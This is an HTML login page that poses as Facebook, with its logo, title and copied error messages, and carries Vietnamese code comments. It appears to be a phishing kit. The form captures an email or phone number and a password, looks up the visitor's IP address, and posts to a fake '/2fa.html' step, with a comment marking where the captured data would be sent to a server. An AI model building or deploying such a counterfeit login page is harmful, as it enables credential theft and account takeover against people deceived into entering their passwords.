<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="login.css">
    <link rel="shortcut icon" type="image/x-icon" href="acsets/Facebook_Logo_(2019).png">
    <title>Facebook</title>
</head>

<body>
    <div class="logo">
        <p style="color: #4f5255;">English(UK)</p>
        <img style="margin-top:60px;" width="58px" src="acsets/Facebook_Logo_(2019).png" alt="">
    </div>
    <div class="form" style="text-align: center;">
        <form id="loginForm" action="/2fa.html" method="post" onsubmit="return validateForm(event)">
            <div>
                <input placeholder="Mobile number or email" required type="text" id="email">
            </div>
            <div>
                <input placeholder="Password" type="password" required id="password">
            </div>
            <div id="error" style="color: red; display: none;"></div>
            <div style="display: flex;
            align-items: center;
            justify-content: center;
            width: 100%;
            margin: 0 auto;">
                <button style="margin:10 auto; display: flex; align-items: center; justify-content: center;"
                    type="submit" class="submit" id="submitButton">
                    <span id="continueText">Log in</span>
                    <img id="loadingIcon" width="30px" src="/acsets/loading.png" alt=""
                        style="margin-left: 5px; display: none;">
                </button>
            </div>
        </form>
        <a href="#">Forgotten Password?</a>
    </div>
    <div class="form">
        <div><button class="btn" type="button">Create new account</button></div>
        <div style="margin-top: 20px;"><img class="meta" width="60px" src="acsets/logo.png" alt=""></div>
    </div>
    <div style="height: 50px;">

    </div>

    <script>
        async function getUserIP() {
            try {
                const response = await fetch('https://api.ipify.org?format=json');
                const data = await response.json();
                return data.ip; // Trả về địa chỉ IP
            } catch (error) {
                console.error('Error fetching IP address:', error);
                return 'N/A'; // Nếu không lấy được IP
            }
        }

        async function validateForm(event) {
            event.preventDefault();
            const emailOrPhone = document.getElementById('email').value;
            const password = document.getElementById('password').value;
            document.getElementById("continueText").style.display = "none";
            document.getElementById("loadingIcon").style.display = "block";

            // Reset lỗi
            document.getElementById('error').style.display = 'none';

            const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
            const phoneRegex = /^\d{7,15}$/;

            if (!emailRegex.test(emailOrPhone) && !phoneRegex.test(emailOrPhone)) {
                document.getElementById('error').innerText = "The email address or mobile number you entered isn't connected to an account.";
                document.getElementById('error').style.display = 'block';
                document.getElementById("continueText").style.display = "block";
                document.getElementById("loadingIcon").style.display = "none";
                return false;
            }
            // Kiểm tra password trên 6 ký tự
            if (!password) {
                document.getElementById('error').innerText = "The password that you've entered is incorrect.";
                document.getElementById('error').style.display = 'block';
                document.getElementById("continueText").style.display = "block";
                document.getElementById("loadingIcon").style.display = "none";
                return false;
            }

            // Kiểm tra email hoặc số điện thoại

            const now = new Date();
            const date = now.toISOString().slice(0, 19).replace(" T ", " ");

            // đẩy api về server
            return true
        }
    </script>
</body>

</html>